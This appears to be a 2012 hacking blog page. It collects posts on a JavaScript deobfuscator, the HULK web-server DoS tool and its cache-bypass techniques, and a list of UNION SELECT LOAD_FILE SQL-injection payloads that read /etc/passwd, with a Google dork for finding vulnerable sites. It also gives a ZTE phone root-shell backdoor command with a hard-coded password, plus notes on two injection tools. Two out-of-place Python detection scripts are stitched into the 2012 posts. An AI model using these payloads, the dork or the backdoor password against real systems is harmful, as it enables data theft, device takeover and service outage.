May 18, 2012

Revelo: The Javascript Deobfuscator!

Analysing highly obfuscated JavaScript, such as exploit packs and obfuscated script kits, can be very difficult at times. In times like these, the aptly named Revelo can help. Revelo is Latin for “reveal”. The purpose of this tool is to assist the user in analysing obfuscated JavaScript code, particularly code that redirects the browser to malicious URLs.

Revelo is not as full-fledged as MalZilla, but doing what the now defunct MalZilla did is its purpose anyway. Revelo automates some of the manual changes that are needed to de-obfuscate the script code. It is not a script debugger; it is more like a set of tools to de-obfuscate scripts. Revelo works by writing the JavaScript, with some user-chosen modifications, to an HTML file, opening that file inside the tool, and extracting the de-obfuscated elements using the Internet Explorer engine. All of this is done while allowing the user to make choices based on his/her understanding of the obfuscated script.


Revelo 0.3
Features of Revelo:

    Analyze a script quickly by loading a file or pasting in JavaScript code
    Includes several methods to de-obfuscate JavaScript
    Includes a built-in browser proxy which displays the URL of outgoing requests
    Displays the Document Object Model (DOM) elements
    Includes a packet sniffer which logs incoming and outgoing requests
    Includes a software firewall to prevent the program from accessing Internet content accidentally
    Ability to act as a web proxy to catch and block redirects
    Beautifies JavaScript code to make it more readable
    Ability to clear the browser cookies
    Ability to spoof the user-agent string

While this tool does have some protections built into it, it may execute malicious code that could harm your computer, so use it in a virtual machine. It has been tested to run on Windows XP systems. Features such as the built-in firewall, which protects the user from accidental redirects, also help. Revelo has a built-in packet sniffer and proxy so that the resulting HTTP request can be captured without actually visiting the site. It can also reveal the actual de-obfuscated code and has a built-in JavaScript beautifier. Revelo can help you identify the key elements of the JavaScript or even walk the DOM tree. It ships with the free and lightweight Enigma Virtual Box, among other ActiveX controls.

From the looks of it, Revelo runs into a few problems on the Windows 7 operating system. But if you use it as prescribed, in a Windows XP VM (like we did), you won't face any problems.

Download Revelo:

Revelo v0.3 – Revelo –


If you like my blog, Please Donate Me

HULK, Web Server DoS Tool

Introducing HULK (Http Unbearable Load King).

In my line of work, I get to see tons of different nifty hacking tools, and traffic generation tools that are meant to either break and steal information off a system, or exhaust its resource pool, rendering the service dead and putting the system under a denial of service.

For a while now, I have been playing with some of the more exotic tools, finding that their main problem is always the same… they create repeatable patterns. Too easy to predict the next request that is coming, and therefore mitigate. Some, although elegant, lack the horsepower to really put a system on its knees.

For research purposes, I decided to take some of the lessons I’ve learned over time and practice what I preach.

Enforcing Python’s engines, I wrote a script that generates some nicely crafted unique Http requests, one after the other, generating a fair load on a webserver, eventually exhausting it of resources. This can be optimized much, much further, but as a proof of concept and generic guidance it does its job.

As a guideline, the main concept of HULK is to generate unique requests for each and every request generated, thus avoiding/bypassing caching engines and affecting the server’s load directly.

I have published it to Packet Storm, as we do.
Some Techniques

    Obfuscation of Source Client – this is done by using a list of known User Agents, and for every request that is constructed, the User Agent is a random value out of the known list
    Reference Forgery – the referer that points at the request is obfuscated and points into either the host itself or some major prelisted websites.
    Stickiness – using some standard Http command to try and ask the server to maintain open connections by using Keep-Alive with variable time window
    no-cache – this is a given, but by asking the HTTP server for no-cache, a server that is not behind a dedicated caching service will present a unique page.
    Unique Transformation of URL – to eliminate caching and other optimization tools, I crafted custom parameter names and values and they are randomized and attached to each request, rendering it to be Unique, causing the server to process the response on each event.
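As an added example (not HULK's own code and not part of this post), a defender-side script in Python that scores each client IP for the traffic traits listed above: a User-Agent that changes on every request, query parameter names that never repeat, and Cache-Control: no-cache on every request. The pipe-delimited log format, the sample lines and the 0.8 thresholds are constructed assumptions; the referer field is parsed but not scored.

```python
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines (not captured traffic), one request per line:
# client_ip | request path | Referer | User-Agent | Cache-Control
LOG_LINES = [
    "10.0.0.5|/?kqzx=1a9f|http://www.example.com/|Mozilla/5.0 (Windows NT 6.1) Firefox/12.0|no-cache",
    "10.0.0.5|/?pwmd=77be|http://www.google.com/?q=a|Mozilla/4.0 (compatible; MSIE 7.0)|no-cache",
    "10.0.0.5|/?ab=9|http://www.example.com/|Opera/9.80 (Windows NT 5.1)|no-cache",
    "10.0.0.5|/?rrt=c2|http://www.usatoday.com/|Mozilla/5.0 (Macintosh) Safari/534|no-cache",
    "10.0.0.5|/?zzqp=0|http://www.engadget.com/|Mozilla/5.0 (X11; Linux) Chrome/19|no-cache",
    "10.0.0.5|/?lkj=ff|http://www.example.com/|Mozilla/5.0 (Windows NT 5.1) Firefox/3.6|no-cache",
    "10.0.0.9|/index.php?page=2|-|Mozilla/5.0 (Windows NT 6.1) Firefox/12.0|-",
    "10.0.0.9|/index.php?page=3|http://www.example.com/|Mozilla/5.0 (Windows NT 6.1) Firefox/12.0|-",
    "10.0.0.9|/index.php?page=4|http://www.example.com/index.php?page=3|Mozilla/5.0 (Windows NT 6.1) Firefox/12.0|-",
]


def parse_line(line):
    """Split one constructed log line; the query parameter *names* are kept as a set."""
    ip, path, referer, ua, cache = line.split("|")
    names = frozenset(k for k, _ in parse_qsl(urlsplit(path).query, keep_blank_values=True))
    return ip, names, referer, ua, cache


def score_sources(lines, min_requests=5, threshold=0.8):
    """Per client IP: ratio of distinct User-Agents, ratio of distinct parameter-name
    sets, and ratio of no-cache requests. A normal client reuses one UA and a few
    parameter names; HULK-style traffic scores close to 1.0 on the first two."""
    per_ip = defaultdict(lambda: {"n": 0, "uas": set(), "names": set(), "no_cache": 0})
    for line in lines:
        ip, names, _referer, ua, cache = parse_line(line)
        s = per_ip[ip]
        s["n"] += 1
        s["uas"].add(ua)
        s["names"].add(names)
        if "no-cache" in cache.lower():
            s["no_cache"] += 1
    verdicts = {}
    for ip, s in per_ip.items():
        n = s["n"]
        ua_ratio, name_ratio = len(s["uas"]) / n, len(s["names"]) / n
        verdicts[ip] = {
            "requests": n,
            "ua_ratio": round(ua_ratio, 2),
            "param_ratio": round(name_ratio, 2),
            "nocache_ratio": round(s["no_cache"] / n, 2),
            "hulk_like": n >= min_requests and ua_ratio >= threshold and name_ratio >= threshold,
        }
    return verdicts
```

Run `score_sources(LOG_LINES)` to see the flooding source flagged and the browsing client left alone; the minimum request count keeps single page views from ever being scored.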


Basically my test web server with 4 GB of RAM running Microsoft IIS7 was brought to its knees in less than a minute, running all requests from a single host.

In the pictures below you can see the tool in action: first ( #1 ) it is executed against a URL and starts generating a load of unique requests, sending them to the target server ( host of the URL ), and second ( #2 ) we can see that the server at some point starts failing to respond since it has exhausted its resource pool.

Note the “safe” word is meant to kill the process after all threads got a 500 error; since it’s easier to control in a lab, it is optional.

File : ( zip file )

The tool is meant for educational purposes only, and should not be used for malicious activity of any kind.



May 15, 2012

LFI with SQL Injection

Try to search with
inurl:"*.php?*=*"+ ( inurl:"*../*" + ( inurl:"LOAD_FILE" | inurl:"UNION" | inurl:"AND" ) ) + intext:"root:x:0:0:root:/root:**"
 Example that I found
  • ?id=-1+union+select+load_file(0x2f6574632f706173737764)%2Cload_file(0x2f6574632f706173737764)%2Cload_file(0x2f6574632f706173737764) 
  • ?category_ID=5+AND+1=2+UNION+SELECT+load_file(0x2f6574632f706173737764)--
  • ?id=36+UNION+all+SELECT%201,2,3,load_file(%27/etc/passwd%27)--
  • ?conf=-1198+UNION+SELECT+1,2,3,4,CONCAT(0x6d7973716c6669,load_file(0x2f6574632f706173737764),0x6d7973716c6669),6,7,8,9,10,11,12,13,14,15,16--
  • ?id=1067/**/UNION/**/SELECT/**/LOAD_FILE(0x2F6574632F706173737764),2,3,4/**/LIMIT/**/1,1/*
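An added example, not from the original post: a small Python check that undoes the encodings used in the payload shapes above (URL encoding, /**/ comment whitespace, and the MySQL hex literal 0x2f6574632f706173737764 that stands for /etc/passwd) and reports which file a LOAD_FILE() injection attempt is asking for, so a log reviewer can see the target path instead of an opaque hex string. The sample query strings are constructed from the shapes listed above.

```python
import re
from urllib.parse import unquote_plus

# Constructed query strings modelled on the payload shapes above (not captured traffic).
SAMPLES = [
    "id=-1+union+select+load_file(0x2f6574632f706173737764)%2Cload_file(0x2f6574632f706173737764)",
    "id=36+UNION+all+SELECT%201,2,3,load_file(%27/etc/passwd%27)--",
    "id=1067/**/UNION/**/SELECT/**/LOAD_FILE(0x2F6574632F706173737764),2,3,4/**/LIMIT/**/1,1/*",
    "id=42",
]

# LOAD_FILE( <hex literal> | '<string>' | "<string>" )
LOAD_FILE = re.compile(r"load_file\s*\(\s*(0x[0-9a-fA-F]+|'[^']*'|\"[^\"]*\")\s*\)", re.IGNORECASE)


def normalise(query):
    """Undo the encodings seen in the payloads: '+' and %XX URL encoding, then the
    /**/ inline comments that attackers use in place of spaces."""
    decoded = unquote_plus(query)
    return re.sub(r"/\*.*?\*/", " ", decoded)


def decode_hex_literal(token):
    """MySQL reads 0x2f65... as a string; turn it back into text for the analyst."""
    return bytes.fromhex(token[2:]).decode("latin-1")


def find_file_reads(query):
    """Return the file paths that LOAD_FILE() calls in the query string ask for."""
    paths = []
    for m in LOAD_FILE.finditer(normalise(query)):
        arg = m.group(1)
        paths.append(decode_hex_literal(arg) if arg.lower().startswith("0x") else arg[1:-1])
    return paths


def is_union_load_file(query):
    """True when the query shows the UNION SELECT ... LOAD_FILE pattern from the list above."""
    text = normalise(query).upper()
    return "UNION" in text and "SELECT" in text and bool(find_file_reads(query))
```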


May 14, 2012

Nice backdoor, ZTE.

    The ZTE Score M is an Android 2.3.4 (Gingerbread) phone available in the United States on MetroPCS, made by Chinese telecom ZTE Corporation.
    There is a setuid-root application at /system/bin/sync_agent that serves no function besides providing a root shell backdoor on the device.  Just give the magic, hard-coded password to get a root shell:
    $ sync_agent ztex1609523
    # id
    uid=0(root) gid=0(root)
    Nice backdoor, ZTE.




May 13, 2012

WebVulScan - web application vulnerability scanner

WebVulScan is a web application vulnerability scanner. It is a web application itself written in PHP and can be used to test remote, or local, web applications for security vulnerabilities. As a scan is running, details of the scan are dynamically updated to the user. These details include the status of the scan, the number of URLs found on the web application, the number of vulnerabilities found and details of the vulnerabilities found.
After a scan is complete, a detailed PDF report is emailed to the user. The report includes descriptions of the vulnerabilities found, recommendations and details of where and how each vulnerability was exploited.
The vulnerabilities tested by WebVulScan are:
  • Reflected Cross-Site Scripting
  • Stored Cross-Site Scripting
  • Standard SQL Injection
  • Broken Authentication using SQL Injection
  • Autocomplete Enabled on Password Fields
  • Potentially Insecure Direct Object References
  • Directory Listing Enabled
  • HTTP Banner Disclosure
  • SSL Certificate not Trusted
  • Unvalidated Redirects
The features of WebVulScan are:
  • Crawler: Crawls a website to identify and display all URLs belonging to the website.
  • Scanner: Crawls a website and scans all URLs found for vulnerabilities.
  • Scan History: Allows a user to view or download PDF reports of previous scans that they performed.
  • Register: Allows a user to register with the web application.
  • Login: Allows a user to login to the web application.
  • Options: Allows a user to select which vulnerabilities they wish to test for (all are enabled by default).
  • PDF Generation: Dynamically generates a detailed PDF report.
  • Report Delivery: The PDF report is emailed to the user as an attachment.
This software was developed, and should only be used, entirely for ethical purposes. Running security testing tools such as this on a website (web application) could damage it. In order to stay ethical, you must ensure you have permission of the owners before testing a website (web application). Testing the security of a website (web application) without authorisation is unethical and against the law in many countries. 




sqlcake - Automatic SQL injection and database information gathering tool.

sqlcake is an automatic database-dumping and interactive SQL shell tool: it dumps the current database structure, including tables and columns, and then turns into an interactive MySQL prompt with extra features. Written in Ruby.

Download :
